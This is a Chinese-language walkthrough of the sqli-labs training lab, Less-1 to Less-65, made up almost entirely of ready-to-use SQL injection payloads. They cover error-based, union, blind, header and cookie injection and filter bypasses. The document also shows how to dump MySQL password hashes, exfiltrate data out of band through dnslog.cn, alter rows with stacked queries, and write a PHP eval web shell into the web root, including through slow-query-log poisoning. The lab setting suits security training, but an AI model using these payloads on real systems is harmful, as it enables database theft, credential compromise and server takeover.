- 运行环境
- Less-1(漏洞利用)
- Less-2
- Less-3
- Less-4
- Less-5
- Less-6
- Less-7
- Less-8
- Less-9
- Less-10
- Less-11
- Less-12
- Less-13
- Less-14
- Less-15
- Less-16
- Less-17
- Less-18
- Less-19
- Less-20
- Less-21
- Less-22
- Less-23
- Less-24
- Less-25
- Less-25a
- Less-26
- Less-26a
- Less-27
- Less-27a
- Less-28
- Less-28a
- Less-29
- Less-30
- Less-31
- Less-32
- Less-33
- Less-34
- Less-35
- Less-36
- Less-37
- Less-38
- Less-39
- Less-40
- Less-41
- Less-42
- Less-43
- Less-44
- Less-45
- Less-46
- Less-47
- Less-48
- Less-49
- Less-50
- Less-51
- Less-52
- Less-53
- Less-54
- Less-55
- Less-56
- Less-57
- Less-58
- Less-59
- Less-60
- Less-61
- Less-62
- Less-63
- Less-64
- Less-65
运行环境
*****************
*mysql 5.7.26 *
*php 5.5.9nts*
*apache 2.4.39 *
*****************
Less-1(漏洞利用)
基于报错注入查询数据库数据
gtid_subset报错
1' and gtid_subset(user(),1) %23
1' and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)%23
1' and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) %23
1' and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) %23
1' and gtid_subset(concat(0x7e,(select group_concat(concat(username,':',password)) from security.users)),1) %23
floor报错
-1' union select 1,2,count(*) from information_schema.tables group by concat(floor(rand(0)*2) ,0x7e,user())%23
updatexml报错
' or updatexml(1,concat(0x7e,database()),1)%23
extractvalue报错
' or extractvalue(1,concat(0x7e,database()))%23
联合查询注入查询数据库数据
-1' union select 1,2,3 %23
-1' union select 1,2,group_concat(schema_name) from information_schema.schemata %23
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' %23
-1' union select 1,2,group_concat(concat(username,':',password)) from security.users %23
带外查询注入查询数据库数据
注:yourid需要上dnslog.cn获取,查询结果也需要在那上面查看,不行就重新获取id或重试几次
-1' union select 1,2,load_file(concat('////',(select schema_name from information_schema.schemata limit 0,1),'.yourid.dnslog.cn/abc')) %23
-1' or if((select load_file(concat('////',(select schema_name from information_schema.schemata limit 4,1),'.yourid.dnslog.cn/abc'))),1,0) %23
查看数据库路径,如果是用phpstudy就可以知道www根目录
' union select 1,2,@@datadir %23
查看数据库版本
-1' union select 1,2,version() %23
查看数据库所在的主机主机名
-1' union select 1,2,@@hostname %23
查看当前数据库用户
-1' union select 1,2,user() %23
查看数据库所有用户
-1' union select 1,2,group_concat(concat(user,'@',host)) from mysql.user %23
查看数据库用户的密码(拿去cmd5解密)
-1' union SELECT 1,2,group_concat(concat(user,'-',authentication_string)) FROM mysql.user %23
查看用户所有权限
-1' union SELECT 1,2,group_concat(concat(grantee,'-',privilege_type)) FROM INFORMATION_SCHEMA.USER_PRIVILEGES %23
查看当前用户是否有文件读取写入权限(有为Y,无为N,把users的值改为当前用户)
' or updatexml(1,concat('~file_priv:',(SELECT file_priv FROM mysql.user WHERE user='root' )),1)%23
查看Mysql是否允许文件读取写入(为空代表有)
-1' union select 1,2,@@secure_file_priv %23
读取文件内容(路径有文件读取才行)
-1' union select 1,2,load_file('e:/url.txt') %23
导出数据(写入文件)
-1' union select 1,2,user() into outfile 'e:/demo.txt' %23
-1' union select 1,2,user() into dumpfile 'e:/demo1.txt' %23
导出一句话木马到目标服务器
-1' union select 1,2,"<?php eval($_REQUEST['pass'])?>" into outfile 'F:/phpstudy_pro/WWW/muma.php' %23
1' into outfile 'F:/phpstudy_pro/WWW/muma1.php' lines terminated by '<?php eval($_REQUEST['pass'])?>' %23
1' into outfile 'F:/phpstudy_pro/WWW/muma2.php' lines starting by "<?php eval($_REQUEST['pass'])?>"%23
1' into outfile 'F:/phpstudy_pro/WWW/muma3.php' fields terminated by "<?php eval($_REQUEST['pass'])?>"%23
1' into outfile 'F:/phpstudy_pro/WWW/muma4.php' COLUMNS terminated by "<?php eval($_REQUEST['pass'])?>"%23
将一句话木马转换成十六进制,Mysql能够识别,并将十六进制转换为字符串
1' into outfile 'F:/phpstudy_pro/WWW/muma5.php' lines terminated by 0x3c3f706870206576616c28245f524551554553545b2770617373275d293f3e %23
查看慢日志查询是否开启(开启为1,关闭为0)
-1' union select 1,2,@@slow_query_log %23
慢日志查询在my.ini配置文件中[mysqld]下添加slow_query_log = ON即可开启
如果开启了,查看日志存放路径(如F:\phpstudy_pro\Extensions\MySQL5.7.26\data\DESKTOP-SRG99HI-slow.log)
-1' union select 1,2,@@slow_query_log_file %23
慢查询默认将执行了10秒的sql语句存放在日志中,我们构造一个睡10秒的sql语句
-1' union select 1,sleep(10),"<?php eval($_REQUEST['pass'])?>" %23
然后将日志复制到www根目录下,方便我们使用工具getshell
-1' union select 1,2,load_file('F:/phpstudy_pro/Extensions/MySQL5.7.26/data/DESKTOP-SRG99HI-slow.log') into outfile "F:/phpstudy_pro/WWW/muma6.php" %23
Less-2
1 or gtid_subset(user(),1)
1 and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)
Less-3
1') or gtid_subset(user(),1)%23
1') and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)%23
Less-4
1") or gtid_subset(user(),1)%23
Less-5
1' or gtid_subset(user(),1)%23
Less-6
1" or gtid_subset(user(),1)%23
Less-7
-1')) union select 1,2,user() into outfile 'e:/demo.txt' %23
Less-8
' or ascii(substr(database(),1,1))>97 %23
' or ascii(substr(database(),1,1))=115 %23
Less-9
' or if(ascii(substr(database(),1,1))=114,sleep(2),1) %23
' or if(ascii(substr(database(),1,1))=115,sleep(2),1) %23
Less-10
" or if(ascii(substr(database(),1,1))=114,sleep(2),1) %23
" or if(ascii(substr(database(),1,1))=115,sleep(2),1) %23
Less-11
Less11-17开burpsuite改请求体
uname=1' or gtid_subset(user(),1)%23&passwd=12&submit=Submit
Less-12
uname=1") or gtid_subset(user(),1)%23&passwd=12&submit=Submit
Less-13
uname=1') or gtid_subset(user(),1)%23&passwd=12&submit=Submit
Less-14
uname=1" or gtid_subset(user(),1)%23&passwd=12&submit=Submit
Less-15
uname=' or ascii(substr(database(),1,1))=114 %23&passwd=12&submit=Submit
uname=' or ascii(substr(database(),1,1))=115 %23&passwd=12&submit=Submit
Less-16
uname=") or if(ascii(substr(database(),1,1))=114,sleep(2),1)%23&passwd=12&submit=Submit
uname=") or if(ascii(substr(database(),1,1))=115,sleep(2),1)%23&passwd=12&submit=Submit
Less-17
uname=admin&passwd=1' and gtid_subset(user(),1)%23&submit=Submit
Less-18
UA注入
登录时的账号密码一定要正确,然后抓包修改UA
User-Agent: ' or gtid_subset(user(),1) or '
Less-19
Referer注入
登录时的账号密码一定要正确,然后抓包修改Referer
Referer: ' or gtid_subset(user(),1) or '
Less-20
cookie注入
登录时的账号密码一定要正确,然后抓包第二个包修改cookie
Cookie: uname=' or gtid_subset(user(),1)%23
Less-21
cookie注入
登录时的账号密码一定要正确,然后抓包第二个包修改cookie,cookie要进行base64加密
加密前:') or gtid_subset(user(),1)# 加密后:Jykgb3IgZ3RpZF9zdWJzZXQodXNlcigpLDEpIw==
Cookie: uname=Jykgb3IgZ3RpZF9zdWJzZXQodXNlcigpLDEpIw==
Less-22
cookie注入
登录时的账号密码一定要正确,然后抓包第二个包修改cookie,cookie要进行base64加密
加密前:" or gtid_subset(user(),1)# 加密后:IiBvciBndGlkX3N1YnNldCh1c2VyKCksMSkj
Cookie: uname=IiBvciBndGlkX3N1YnNldCh1c2VyKCksMSkj
Less-23
过滤#,--
绕过
' or gtid_subset(user(),1) or '
' union select 1,user(),3 or '
' union select 1,user(),3 '
Less-24
二次注入
1.创建一个用户test 密码asd
2.假装用户test忘记密码
3.创建一个用户test'# 密码123
4.登录test'#用户 ,修改密码为admin
5.(数据库执行了UPDATE users SET PASSWORD='admin' where username='test'#' and password='123'这个sql语句)
6.所以本来是修改test'#用户的密码,变成了修改test的密码
Less-25
过滤and,or
绕过
' oorr gtid_subset(user(),1)%23
' aandnd gtid_subset(user(),1)%23
' %26%26 gtid_subset(user(),1)%23
' %7c%7c gtid_subset(user(),1)%23
Less-25a
过滤and,or
绕过
-1 oorr ascii(substr(database(),1,1))=114
-1 oorr ascii(substr(database(),1,1))=115
Less-26
过滤and,or,#,--,/*,\s,\
绕过
'||gtid_subset(user(),1)||'
'%26%26gtid_subset(database(),1)%26%26'
Less-26a
过滤and,or,#,--,/*,\s,\
绕过
'||ascii(substr(database(),1,1))=114||'
'||ascii(substr(database(),1,1))=115||'
Less-27
过滤union,select,and,or,#,--,/*,空格
绕过
'%0aUnIoN%0aSeLeCT%0a1,user(),3||'
'||gtid_subset(concat(0x7e,(SeLeCT%0agroup_concat(schema_name)%0afrom%0ainformation_schema.schemata)),1)||'
Less-27a
过滤union,select,and,or,#,--,/*,空格
绕过
"%0aUnIoN%0aSeLeCT%0a1,user(),3||"
Less-28
过滤union select,#,--,/*,空格
绕过
')%0auunion%0aselectnion%0aselect%0a1,user(),3||('
Less-28a
过滤union select
绕过
')%0auunion%0aselectnion%0aselect%0a1,user(),3||('
Less-29
白名单绕过
关卡在login.php,不在index.php
使用HTTP参数污染,源码只验证了第一个id值,没进行验证第二个id值
http://192.168.31.242/sqli-labs/Less-29/login.php?id=1&id=-1' union select 1,2,database() --+
Less-30
白名单绕过
关卡在login.php,不在index.php
HTTP参数污染
源码只验证了第一个id值,没进行验证第二个id值
http://192.168.31.242/sqli-labs/Less-30/login.php?id=1&id=-1" union select 1,2,database() --+
Less-31
白名单绕过
关卡在login.php,不在index.php
HTTP参数污染
源码只验证了第一个id值,没进行验证第二个id值
http://192.168.31.242/sqli-labs/Less-31/login.php?id=1&id=-1") union select 1,2,database() --+
Less-32
宽字节绕过转义
-1%df' union select 1,2,group_concat(schema_name) from information_schema.schemata%23
-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x70696b61636875 %23
0x70696b61636875是pikachu转十六进制的值
Less-33
宽字节绕过转义
-1%df' union select 1,2,group_concat(schema_name) from information_schema.schemata%23
-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x70696b61636875 %23
Less-34
宽字节绕过转义
开burpsuite改请求体
uname=12&passwd=12%df' or gtid_subset(user(),1) %23&submit=Submit
Less-35
宽字节绕过转义
1 and gtid_subset(concat(0x7e,(select group_concat(schema_name) from information_schema.schemata )),1)
查看pikachu的表
1 and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x70696b61636875)),1)
Less-36
宽字节绕过转义
-1%df' union select 1,2,group_concat(schema_name) from information_schema.schemata%23
Less-37
宽字节绕过转义
开burpsuite改请求体
uname=-1%df' union select 2,group_concat(schema_name) from information_schema.schemata%23&passwd=12&submit=Submit
Less-38
堆叠查询,先用联合查询注入知道数据库、表、列的值
1';create database abc;
-1';insert into users values(17,'test2','0');
-1';delete from users where username='test2';
-1';update users set password='123' where username='Dumb';
Less-39
堆叠查询
-1;insert into users values(18,'test3','0');
Less-40
堆叠查询
-1');insert into users values(19,'test4','0');
Less-41
堆叠查询
1;insert into users values(20,'test5','0');
Less-42
堆叠查询
开burpsuite改请求体
login_user=11&login_password=-1';insert into users values(21,'test5','0');&mysubmit=Login
(这里相当于新建一个test5用户,密码为0)
Less-43
可以不用堆叠查询
开burpsuite改请求体
login_user=11&login_password=1') or gtid_subset(user(),1) %23&mysubmit=Login
Less-44
堆叠查询
开burpsuite改请求体
login_user=11&login_password=1';insert into users values(22,'test6','0');&mysubmit=Login
Less-45
堆叠查询
开burpsuite改请求体
login_user=11&login_password=1');insert into users values(23,'test6','0');&mysubmit=Login
Less-46
order by注入
报错注入
updatexml(1,concat(0x7e,user()),1)
extractvalue(1,concat(0x7e,database()))
时间盲注
1 and if(ascii(substr(database(),1,1))=115,0,sleep(2))
1 and if(ascii(substr(database(),1,1))=116,0,sleep(2))
写入一句话木马
1 INTO OUTFILE 'e:/m.php' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b2770617373275d293f3e
Less-47
order by注入
1' and updatexml(1,concat(0x7e,user()),1)%23
1' and extractvalue(1,concat(0x7e,database()))%23
写入木马
1' INTO OUTFILE 'e:/m.php' LINES TERMINATED BY 0x3c3f706870206576616c28245f504f53545b2770617373275d293f3e %23
Less-48
order by注入
时间盲注
1 and if(ascii(substr(database(),1,1))=115,0,sleep(2))
1 and if(ascii(substr(database(),1,1))=116,0,sleep(2))
Less-49
order by注入
时间盲注
1' and if(ascii(substr(database(),1,1))=115,0,sleep(2))%23
1' and if(ascii(substr(database(),1,1))=116,0,sleep(2))%23
Less-50
order by注入
报错注入
updatexml(1,concat(0x7e,user()),1)
extractvalue(1,concat(0x7e,database()))
还可以堆叠查询注入,参考Less-38
Less-51
order by注入
1' and updatexml(1,concat(0x7e,user()),1)%23
1' and extractvalue(1,concat(0x7e,database()))%23
还可以堆叠查询注入,参考Less-38
Less-52
order by注入
时间盲注
1 and if(ascii(substr(database(),1,1))=115,0,sleep(2))
1 and if(ascii(substr(database(),1,1))=116,0,sleep(2))
还可以堆叠查询注入,参考Less-38
Less-53
order by注入
时间盲注
1' and if(ascii(substr(database(),1,1))=115,0,sleep(2))%23
1' and if(ascii(substr(database(),1,1))=116,0,sleep(2))%23
还可以堆叠查询注入,参考Less-38
Less-54
此挑战的目标是在不到10次的尝试中,仅从数据库的随机表(“挑战”)中转储(密钥)为了好玩,每次重置,挑战都会产生随机的表名、列名和表数据。随时保持新鲜([]中的参数需要更改)
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
查到表名是nvw9mo2tqp
-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='[nvw9mo2tqp]' %23
查到字段名是id,sessid,secret_CJZ0,tryy
-1' union select 1,2,group_concat(concat(sessid,':',[secret_CJZ0])) from challenges.[nvw9mo2tqp] %23
然后将:后面的值提交即可过关
Less-55
首先点击Reset the Challenge!,重置数据库,方法跟Less-54一样
-1) union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
查到表名是wchcrmmhzw
-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='wchcrmmhzw' %23
查到字段名是id,sessid,secret_CDNC,tryy
-1) union select 1,2,group_concat(concat(sessid,':',secret_CDNC)) from challenges.wchcrmmhzw %23
然后将:后面的值提交即可过关
Less-56
首先点击Reset the Challenge!,重置数据库,方法跟Less-54一样
-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
查到表名是u4w32ptczx
-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='u4w32ptczx' %23
查到字段名是id,sessid,secret_SADN,tryy
-1') union select 1,2,group_concat(concat(sessid,':',secret_SADN)) from challenges.u4w32ptczx %23
然后将:后面的值提交即可过关
Less-57
首先点击Reset the Challenge!,重置数据库,方法跟Less-54一样
-1" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges' %23
查到表名是kktpgr0pk2
-1" union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='kktpgr0pk2' %23
查到字段名是id,sessid,secret_533C,tryy
-1" union select 1,2,group_concat(concat(sessid,':',secret_533C)) from challenges.kktpgr0pk2 %23
然后将:后面的值提交即可过关
Less-58
首先点击Reset the Challenge!,重置数据库,这关需要使用报错注入查询
1' and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) %23
查到表名是ub4yi19a96
1' and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='ub4yi19a96')),1) %23
查到字段名是id,sessid,secret_I3Z9,tryy
1' and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_I3Z9)) from challenges.ub4yi19a96)),1) %23
然后将:后面的值提交即可过关
Less-59
首先点击Reset the Challenge!,重置数据库,这关需要使用报错注入查询
1 and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1)
查到表名是6dwnu523h0
1 and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='6dwnu523h0')),1)
查到字段名是id,sessid,secret_R6HL,tryy
1 and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_R6HL)) from challenges.6dwnu523h0)),1)
然后将:后面的值提交即可过关
Less-60
首先点击Reset the Challenge!,重置数据库,这关需要使用报错注入查询
1") and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) %23
查到表名是8zl4ya4h4y
1") and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='8zl4ya4h4y')),1) %23
查到字段名是id,sessid,secret_XWZV,tryy
1") and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_XWZV)) from challenges.8zl4ya4h4y)),1)%23
然后将:后面的值提交即可过关
Less-61
首先点击Reset the Challenge!,重置数据库,这关需要使用报错注入查询
1')) and gtid_subset(concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')),1) %23
查到表名是vt3n10iqbm
1')) and gtid_subset(concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='vt3n10iqbm')),1) %23
查到字段名是id,sessid,secret_JX4B,tryy
1')) and gtid_subset(concat(0x7e,(select group_concat(concat(sessid,':',secret_JX4B)) from challenges.vt3n10iqbm)),1)%23
然后将:后面的值提交即可过关
Less-62
首先点击Reset the Challenge!,重置数据库,这关需要使用布尔类型盲注
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>110 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>103 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>100 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=102 %23
查到表名是第一个字母是f
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),2,1))>97 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),2,1))>110 %23
') or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),2,1))>103 %23
查看表名第二个字母以从类推
查出表名之后再猜字段
') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="challenges" and table_name="{}" ),1,1))>97%23
') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="challenges" and table_name="{}" ),1,1))>110%23
查完字段之后猜记录
') or ascii(substr((select group_concat(col)from challenges.tb_name),1,1))>97%23
…
由于太过繁杂,所以我这里写了一个脚本
https://blog.csdn.net/weixin_43623271/article/details/122801470
Less-63
首先点击Reset the Challenge!,重置数据库,这关需要使用布尔类型盲注
跟Less-62一样,只是payload闭合方式不一样
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>110 %23
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>103 %23
' or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))=103 %23
跑脚本
https://blog.csdn.net/weixin_43623271/article/details/122801470
Less-64
首先点击Reset the Challenge!,重置数据库,这关需要使用布尔类型盲注
跟Less-62一样,只是payload闭合方式不一样
1)) and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
1)) and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
跑脚本
https://blog.csdn.net/weixin_43623271/article/details/122801470
Less-65
首先点击Reset the Challenge!,重置数据库,这关需要使用布尔类型盲注
跟Less-62一样,只是payload闭合方式不一样
1") and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
1") and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='challenges'),1,1))>97 %23
跑脚本
https://blog.csdn.net/weixin_43623271/article/details/122801470